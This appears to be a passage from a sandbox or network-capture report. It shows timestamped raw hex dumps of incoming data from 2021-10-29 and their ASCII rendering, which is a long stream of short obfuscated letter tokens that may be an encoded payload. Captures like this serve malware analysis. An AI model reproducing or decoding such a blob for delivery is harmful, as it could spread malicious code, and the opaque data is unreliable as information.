                                                            2021-10-29 18:10:44 UTC1270INData Raw: 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 72 20 63 20 4e 20 72 56 20 72 49 20 4c 4c 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 59 20 4e 20 4e 20 59 4d 20 49 4d 20 57 43 20 63 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 43 20 56 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 43 4c 20 57 4e 20 63 43 20 59 43 20 4c 63 20 4c 72 20 4e 56 72 20 49 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 57 4c 20 4e 4e 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 4e 4d 4e 20 4e 4e 43 20 49 63 20 56 4c 63 20 72 49 20 59 56 20 56 49 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 72 20 59 43 20 4c 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 49 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 4c 4c 20 63 20 49 63 20 4e 4e 72 20 49 56 20 4e 43 57 20 4e 4e 56 20
                                                            Data Ascii: Ir NNr NVM NNr c N rV rI LL YW IY NNM NCW NVV rY N N YM IM WC cV NCW NNV Yc YC Vc rC Ir NNr NNY NCL WN cC YC Lc Lr NVr Ir NNM NCW NNI WL NN YC Yr Wr NVC NMN NNC Ic VLc rI YV VI IY WI NNM NCW NNV YC Yr YC L NNN NNr NNI WI NNV YC rW LL c Ic NNr IV NCW NNV
                                                            2021-10-29 18:10:44 UTC1271INData Raw: 57 4c 20 4e 43 4e 20 4e 4e 56 20 59 43 20 56 4d 20 57 4c 20 56 72 49 20 49 59 20 4e 4e 72 20 4e 4e 59 20 56 20 4e 63 4e 20 59 4e 20 72 49 20 59 56 20 63 43 20 4e 4c 49 20 4e 4e 4c 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 56 4c 63 20 59 4e 20 56 43 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4e 4c 20 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4d 20 72 57 20 59 43 20 59 72 20 4d 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 49 4c 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 4e 20 59 72 20 49 72 20 57 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 56
                                                            Data Ascii: WL NCN NNV YC VM WL VrI IY NNr NNY V NcN YN rI YV cC NLI NNL IL NMW NNV VLc YN VC VLV Ir NNc WY NCW NNV YC NNL c Yr Ir NNr NNM NCW NNV YM rW YC Yr Mc NNr NNM NCW IL YN rI YC YL Ir NNr NNM WI NNV YC rW YC Yr Ir NNr NVN NCW NNV YC rr YN Yr Ir WC NNc NCW NNV
                                                            2021-10-29 18:10:44 UTC1272INData Raw: 20 4e 56 63 20 72 43 20 4e 4e 72 20 57 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 56 72 57 20 56 59 59 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 4e 72 20 72 57 20 59 43 20 59 72 20 57 59 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 56 4e 20 72 57 20 59 43 20 72 49 20 57 72 20 4e 4e 56 20 56 63 20 59 56 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 43 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 56 20 4d 56 20 4e 72 59 20 72 49 20 59 43 20 59 72 20 49 4c 20 56 57 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 56 4e 20 4e 43 4e 20 4c 4e 20 4e 4e 43 20 72 49 20 59 43 20 63 43 20 4c 49 20 56 72 4d
                                                            Data Ascii: NVc rC NNr WM NCW NNV YC rI YC Yr IV NNr VrW VYY NNV rW YI YC Yr IY NCY cW NCY NNV NNr rW YC Yr WY NNr NNM NVr L NVN rW YC rI Wr NNV Vc YV NNV YC YI WL NCW Ir NNr NVM NCV MV NrY rI YC Yr IL VW NVV NCW NNV Yc cI LM Yr Ir NNY NVN NCN LN NNC rI YC cC LI VrM
                                                            2021-10-29 18:10:44 UTC1274INData Raw: 20 4e 56 4e 20 4e 43 57 20 4e 4e 56 20 4c 59 20 63 4d 20 72 4c 20 59 72 20 49 72 20 4e 56 43 20 4e 56 4d 20 4e 4e 4e 20 4e 72 20 72 49 20 72 57 20 59 43 20 59 43 20 4e 4e 4c 20 57 59 20 57 49 20 4d 59 20 4e 72 20 59 4e 20 72 57 20 59 43 20 59 43 20 4e 4d 43 20 4e 4e 63 20 4e 59 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 63 4d 20 72 43 20 59 72 20 49 72 20 4e 56 43 20 49 43 20 56 4c 4d 20 4e 4e 72 20 59 4e 20 72 49 20 59 72 20 4c 43 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4c 4e 20 72 63 20 72 49 20 59 43 20 63 43 20 57 59 20 4d 72 20 63 72 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 59 20 57 4c 20 72 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 57 4d 20 4e 56 43 20 72 56 20 4c 57 20 4c 4d 20 4e 49 4d 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 59 20 4c 63 20
                                                            Data Ascii: NVN NCW NNV LY cM rL Yr Ir NVC NVM NNN Nr rI rW YC YC NNL WY WI MY Nr YN rW YC YC NMC NNc NYN NCI NNV YV cM rC Yr Ir NVC IC VLM NNr YN rI Yr LC IY NNr NNM MC LN rc rI YC cC WY Mr cr NCI NNV YC YY WL rL Ir NNr NVM WM NVC rV LW LM NIM NV NNr NNM NCI IY Lc
                                                            2021-10-29 18:10:44 UTC1275INData Raw: 72 49 20 59 43 20 59 72 20 4e 4c 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 72 43 20 59 4e 20 72 49 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4d 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 4d 20 59 4e 20 59 72 20 49 72 20 56 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 72 57 20 72 49 20 59 43 20 59 72 20 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 72 56 20 4e 4e 4c 20 59 43 20 72 49 20 4d 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 72 56
                                                            Data Ascii: rI YC Yr NLI NNr NNM NCW rC YN rI YC Yc Ir NNr NNM NCW NNV YC rI YC Yr Ir NNr MV NCW NNV YC VM YN Yr Ir Vc NNc NCW NNV rW rI YC Yr Wr NNr NNM NCI NNr YC rI YC M Ir NNr NNM rV NNL YC rI Mr YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr rV
                                                            2021-10-29 18:10:44 UTC1276INData Raw: 59 43 20 59 72 20 49 43 20 57 43 20 63 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 63 4d 20 4e 43 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 57 4c 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 4e 4c 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 43 20 72 49 20 59 63 20 49 57 20 57 49 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 56 20 59 63 20 4c 59 20 59 43 20 4d 49 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 43 49 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 4e 59 49 20 72 49 20 59 43 20 72 49 20 59 57 20 4d 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 49 20 59 4e 20 59 72 20 49 56 20 57 57 20 4e 4e 59
                                                            Data Ascii: YC Yr IC WC cc NCW NNV Yc cM NC Yr Ir NVC Vc NWL NNV YC Yr WL NL Ir NNr NVM cW rW YC rI Yc IW WI NNY NNM NCM WM YV Yc LY YC MI VYY rM NCW NNV YN VN VVc VCI Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN NYI rI YC rI YW ML NNM NCW NVV WL I YN Yr IV WW NNY
                                                            2021-10-29 18:10:44 UTC1278INData Raw: 59 63 20 4d 49 20 72 72 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4e 72 20 4e 4e 56 20 59 43 20 59 49 20 4c 72 20 59 72 20 49 63 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4d 59 20 72 63 20 56 4c 56 20 4e 56 56 20 4c 4e 20 49 59 20 72 49 20 59 43 20 63 43 20 57 59 20 4e 4e 4d 20 4e 43 57 20 56 72 4d 20 4e 4e 43 20 4e 57 4e 20 4e 43 63 20 59 43 20 59 72 20 49 59 20 49 4d 20 4e 63 59 20 56 72 4c 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 4c 43 20 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 56 20 59 56 20 59 59 20 4c 4d 20 4e 4d 56 20 57 72 20 49 57 20 4e 4e 4c 20 4e 43 63 20 4e 43 56 20 4e 63 49 20 59 49 20 56 4c 63 20 59 4c 20 4e
                                                            Data Ascii: Yc MI rr Yr Ir NVC Vc NNr NNV YC YI Lr Yr Ic NCN VrI YY NNV YC rW VL LV MY rc VLV NVV LN IY rI YC cC WY NNM NCW VrM NNC NWN NCc YC Yr IY IM NcY VrL NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc LC W NNr NNM NCL WV YV YY LM NMV Wr IW NNL NCc NCV NcI YI VLc YL N
                                                            2021-10-29 18:10:44 UTC1279INData Raw: 72 20 49 59 20 49 4d 20 4e 63 59 20 4e 63 56 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 63 49 20 72 57 20 4e 4e 4c 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 57 56 20 59 43 20 59 72 20 57 72 20 56 57 20 72 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4d 20 4c 57 20 57 72 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 57 56 20 4c 57 20 57 59 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 49 4d 20 4c 43 20 59 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4d 20 59 63 20 56 72 20 4e 56 4e 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 56 20 4e 4e 56
                                                            Data Ascii: r IY IM NcY NcV NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc cI rW NNL NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV WL WV YC Yr Wr VW rL NCW NNV Yc LY YM LW Wr WC ML NCW NNV Yc VW WV LW WY WC ML NCW NNV Yc VW IM LC YV NNr NNM NCL WM Yc Vr NVN Yr Ir NVC Vc NV NNV
                                                            2021-10-29 18:10:44 UTC1280INData Raw: 4d 20 4e 43 4d 20 57 43 20 63 49 20 59 43 20 56 63 20 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4c 4e 20 49 59 20 59 72 20 72 49 20 63 63 20 4c 43 20 4e 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 59 63 20 72 49 20 59 43 20 56 57 20 49 4d 20 4e 4e 49 20 56 63 20 4e 4c 4c 20 4e 4e 4c 20 59 43 20 59 72 20 56 72 20 59 72 20 4d 4e 20 63 63 20 4e 56 63 20 4e 43 57 20 57 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 49 20 4c 57 20 72 49 20 59 43 20 72 49 20 4c 49 20 72 59 20 4e 4e 4c 20 4e 43 57 20 43 20 56 63 20 56 4c 4c 20 59 43 20 59 72 20 49 56 20 57 43 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 56 59 20 59 4e 20 59 72 20 59 4e 20 57 43 20 4e 4e 49 20 4e 56 4c 20 4e 43 72 20 4e 56 63 20 59 56 20 63 56 20 59
                                                            Data Ascii: M NCM WC cI YC Vc LY Ir NNr NNY LN IY Yr rI cc LC NrN NNr NNM NCM II Yc rI YC VW IM NNI Vc NLL NNL YC Yr Vr Yr MN cc NVc NCW WV YC rI YC Yr Ir NNr NNM NNN II LW rI YC rI LI rY NNL NCW C Vc VLL YC Yr IV WC NVc NCW NNV VY YN Yr YN WC NNI NVL NCr NVc YV cV Y
                                                            2021-10-29 18:10:44 UTC1282INData Raw: 49 49 20 49 57 20 4e 43 4d 20 4e 49 4d 20 63 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 56 59 20 59 4c 20 59 59 20 4e 49 49 20 57 59 20 4d 59 20 57 49 20 72 72 20 4e 43 4e 20 4e 43 56 20 72 59 20 4c 56 20 56 63 20 49 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 63 20 4e 43 56 20 59 57 20 4c 49 20 59 4c 20 4e 49 72 20 63 4e 20 4e 56 56 20 56 59 4e 20 72 20 72 4e 20 56 63 20 57 59 20 59 43 20 59 72 20 57 72 20 4e 20 4e 43 56 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 4e 20 59 56 20 4c 72 20 57 4c 20 4e 56 56 20 56 63 20 4d 4d 20 4e 4e 56 20 59 43 20 59 72 20 4c 4c 20 59 43 20 4e 4c 49 20 4e 4e 57 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 4c 49 20 56 63 20 4c 59 20 59 43 20 4e 56 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20
                                                            Data Ascii: II IW NCM NIM cC NNr NNM NCI NVY YL YY NII WY MY WI rr NCN NCV rY LV Vc IW Ir NNr NVM NCc NCV YW LI YL NIr cN NVV VYN r rN Vc WY YC Yr Wr N NCV NCW NNV YV YN YV Lr WL NVV Vc MM NNV YC Yr LL YC NLI NNW IL NMW NNV LI Vc LY YC NVc NNr NNM NCI Wc YC rI YC Yr
                                                            2021-10-29 18:10:44 UTC1283INData Raw: 20 72 49 20 4c 57 20 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 56 20 56 72 20 4d 4e 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 56 20 56 20 43 20 59 43 20 72 49 20 59 63 20 63 4e 20 49 63 20 4e 4e 63 20 4d 20 56 72 43 20 4e 4e 4d 20 59 43 20 63 72 20 59 4c 20 72 57 20 56 4e 49 20 56 4d 20 57 57 20 63 57 20 4e 43 4d 20 59 43 20 72 49 20 59 56 20 56 63 20 49 56 20 4e 20 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 4d 72 20 59 56 20 56 49 20 4d 4e 20 63 63 20 4e 56 4d 20 4e 43 57 20 56 72 4e 20 59 43 20 72 49 20 59 43 20 4c 59 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 59 20 63 72 20 4e 4c 59 20 59 59 20 59 72 20 4c 63 20 57 43 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 56 20 4c 49 20 56 63 20 63 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4e 4e 49 20
                                                            Data Ascii: rI LW L NNM NCW NVV MV Vr MN Yr Ir NVC NNV V C YC rI Yc cN Ic NNc M VrC NNM YC cr YL rW VNI VM WW cW NCM YC rI YV Vc IV N r NCW NNV Yc Mr YV VI MN cc NVM NCW VrN YC rI YC LY Ir NNr NCC NNN NNY cr NLY YY Yr Lc WC IN NCW NNV YV LI Vc cW Ir NNr NVM NCL NNI
                                                            2021-10-29 18:10:44 UTC1284INData Raw: 43 20 56 56 72 20 56 72 20 49 56 20 59 72 20 49 72 20 4e 56 43 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4c 4e 20 63 63 20 72 49 20 59 43 20 63 43 20 49 4d 20 4e 4e 49 20 57 4c 20 4d 72 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 49 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 56 20 59 43 20 72 4c 20 56 20 59 4c 20 49 72 20 4e 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4c 4c 20 72 49 20 59 43 20 4c 57 20 49 63 20 57 72 20 4e 4e 4c 20 4e 4e 4e 20 56 59 72 20 4c 4e 20 59 56 20 4c 49 20 63 43 20 4e
                                                            Data Ascii: C VVr Vr IV Yr Ir NVC NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN LN cc rI YC cC IM NNI WL Mr NNV YC Yr WL IM Ir NNr NVM MN NNV YC rL V YL Ir NNN NNM NCW NNV LL rI YC LW Ic Wr NNL NNN VYr LN YV LI cC N
                                                            2021-10-29 18:10:44 UTC1285INData Raw: 59 20 59 4c 20 4c 4c 20 4e 56 20 4e 43 63 20 72 43 20 63 72 20 4e 56 72 20 59 56 20 63 63 20 4e 4e 63 20 72 57 20 49 72 20 56 20 57 4c 20 4d 43 20 4e 4e 56 20 59 43 20 59 49 20 59 63 20 72 57 20 63 4d 20 72 56 20 4e 56 63 20 4e 43 63 20 4e 4e 72 20 57 4c 20 4e 4d 49 20 59 43 20 59 72 20 57 72 20 4d 4d 20 4c 57 20 4e 72 63 20 4e 72 4c 20 56 43 59 20 59 72 20 56 72 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 56 20 57 4c 20 4e 4e 4d 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 43 4d 20 4e 4e 4d 20 4e 43 57 20 57 4d 20 63 59 20 4e 4d 57 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 57 57 20 4e 43 56 20 57 4e 20 56 43 20 59 72 20 72 49 20 72 57 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 57 20 59 59 20 72 57 20 49 57 20 56 43 49 20 4e 4e 72 20
                                                            Data Ascii: Y YL LL NV NCc rC cr NVr YV cc NNc rW Ir V WL MC NNV YC YI Yc rW cM rV NVc NCc NNr WL NMI YC Yr Wr MM LW Nrc NrL VCY Yr Vr Yr Ir NNr NCV WL NNM YC NNV YC Yr Ir NCM NNM NCW WM cY NMW YC Yr Wr NVC WW NCV WN VC Yr rI rW YW IY NNM NCW NVV rW YY rW IW VCI NNr
                                                            2021-10-29 18:10:44 UTC1287INData Raw: 4e 4d 43 20 59 72 20 49 4e 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 59 4e 20 59 72 20 63 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4c 20 59 43 20 59 4e 20 59 72 20 49 56 20 4e 56 43 20 4e 4d 4e 20 4e 43 72 20 49 63 20 4c 63 20 59 49 20 56 4c 63 20 59 72 20 49 56 20 49 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 63 20 63 43 20 72 49 20 59 59 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 49 20 63 72 20 72 49 20 72 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 4e 43 57 20 4e 4e 56 20 4c 59 20 59 43 20 4d 4c 20 59 56 20 49 72 20
                                                            Data Ascii: NMC Yr IN NVY NNM NCW NNL rN C YN Yr cY NNr NNM NCW NCM YC rI LY YV rM NNV NNM NCW NNc WL YC YN Yr IV NVC NMN NCr Ic Lc YI VLc Yr IV II NNM NCW NNV YN LV YC Yr Ir NNr NNM NCW NVc cC rI YY YM Ir NNr NNc NNI cr rI rI LM Yr Ir NNr NNC NCW NNV LY YC ML YV Ir
                                                            2021-10-29 18:10:44 UTC1288INData Raw: 56 20 72 57 20 49 57 20 49 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56 43 20 4c 56 20 57 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 59 43 20 72 49 20 59 4e 20 4c 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 63 4c 20 63 4e 20 59 72 20 49 4e 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 72 49 20 59 72 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 49 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 72 57 20 57 59 20 4c 63 20 59 59 20 49 72 20 4e 4e 63 20 4e 56 4d 20 4e 4d 57 20 4e 4e 4d 20 56 43 20 4c 49 20 59 63 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20
                                                            Data Ascii: V rW IW IL NNY NNM NCM NVV VLc YL VC LV Wr NMV NNM NCM WC YC rI YN LI Ir NNr NNM NCW NNV YC cL cN Yr IN NVY NNM NCW NNL rN C rI Yr cc NNr NNM NCW NCI YC rI LY YV rM NNV NNM NCW NNc rW WY Lc YY Ir NNc NVM NMW NNM VC LI Yc VLV Ir NNc WY NCW NNV YN LV YC Yr
                                                            2021-10-29 18:10:44 UTC1289INData Raw: 4e 43 56 20 59 43 20 72 49 20 59 43 20 72 56 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 20 72 49 20 72 49 20 59 43 20 59 43 20 49 4d 20 56 57 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 49 20 56 4c 63 20 59 4e 20 4e 4e 72 20 4e 43 43 20 4e 56 4d 20 4e 4d 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 4d 20 57 4e 20 4e 4e 72 20 4e 4e 56 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 63 20 4e 4e 72 20 57 57 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 43 20 59 72 20 63 57 20 4e 4e 56 20 4e 72 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 59 56 20 72 57 20 49 57 20 57 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56
                                                            Data Ascii: NCV YC rI YC rV Ir NNr NCC NNN NN rI rI YC YC IM VW NCV NCI NNV YV YI VLc YN NNr NCC NVM NMW NNV YV Vc YC Yr IY WI NNM NCW NNV YC rI YC YM WN NNr NNV WI NNV YC rW rN c Ic NNr WW NCW NNV YC rr YC Yr cW NNV Nr NNN NNV YC YV rW IW Wr NNY NNM NCM NVV VLc YL V
                                                            2021-10-29 18:10:44 UTC1291INData Raw: 63 20 57 59 20 4e 43 49 20 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4c 20 4e 56 4d 20 4e 4e 56 20 63 56 20 63 4c 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 4e 43 20 4e 4e 56 20 72 56 20 72 49 20 59 43 20 59 72 20 4d 57 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 72 20 4d 4c 20 59 43 20 59 43 20 59 72 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 56 20 4e 43 59 20 59 4e 20 72 49 20 59 56 20 4c 4c 20 57 72 20 4e 4d 56 20 4e 4e 56 20 4d 59 20 4e 43 56 20 59 63 20 56 4c 49 20 59 43 20 72 49 20 4e 56 63 20 4e 4e 59 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 63 57 20 57 57 20 4e 4e 4d 20 4e 43 72 20 4e 56 4d 20 59 43 20 72 49 20 59 4e 20 4e 56 20 49 63 20 4e 43 4e 20 56 63 20 4c 63 20 4e 4e 56 20
                                                            Data Ascii: c WY NCI Wc YC rI YC Yr Ir NNr NCL NVM NNV cV cL YC Yr IY NCY cW NNC NNV rV rI YC Yr MW NNr NNM NVr NNr ML YC YC Yr IC NNL NNL V NCY YN rI YV LL Wr NMV NNV MY NCV Yc VLI YC rI NVc NNY NCN NCW NNV YC rI YC Yr cW WW NNM NCr NVM YC rI YN NV Ic NCN Vc Lc NNV
                                                            2021-10-29 18:10:44 UTC1292INData Raw: 20 57 49 20 59 63 20 4d 49 20 59 59 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 20 4e 43 63 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 56 4d 20 49 72 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 57 59 20 59 4e 20 72 49 20 59 56 20 4c 57 20 57 72 20 4e 56 4d 20 4e 4e 20 4e 43 4e 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 49 57 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 56 63 20 4e 4e 63 20 56 59 20 59 49 20 4e 49 20 4e 57 43 20 4d 4e 20 4e 4e 72 20 4e 4e 4d 20 63 57 20 56 4c 57 20 59 43 20 72 49 20 59 63 20 4c 57 20 49 43 20 4e 4e 63 20 4e 56 59 20 4e 56 4d 20 4e 4e 59 20 57 4c 20 4e 49 59 20 59 43 20 59 72 20 49 56 20 57 72 20 4e 59 63 20 4e 43 43 20 57 57 20 59 59 20 4c 72 20 59 59 20 63 57 20 56 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 72 4c 20 72 57
                                                            Data Ascii: WI Yc MI YY Yr Ir NNI NN NCc NNV YC YV Vc VM Ir NNr NNY cW NWY YN rI YV LW Wr NVM NN NCN NNV YC YV Vc NIW Ir NNr NNY NVc NNc VY YI NI NWC MN NNr NNM cW VLW YC rI Yc LW IC NNc NVY NVM NNY WL NIY YC Yr IV Wr NYc NCC WW YY Lr YY cW VNc NNY NNM NCM II NrL rW
                                                            2021-10-29 18:10:44 UTC1294INData Raw: 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 4e 4e 72 20 72 49 20 72 49 20 59 56 20 63 43 20 4d 59 20 4e 56 59 20 56 72 49 20 57 57 20 4e 4e 56 20 59 43 20 59 43 20 56 4c 20 4c 56 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 4c 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 43 4d 20 49 59 20 4c 4d 20 4c 63 20 56 43 72 20 72 49 20 4e 4c 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 4d 57 20 72 49 20 59 43 20 72 49 20 56 72 63 20 49 4d 20 4e 43 57 20 4e 56 4e 20 4e 72 56 20 59 56 20 4e 43 63 20 59 43 20 59 72 20 49 56 20 4e 20 56 72 72 20 4e 43 57 20 4e 4e 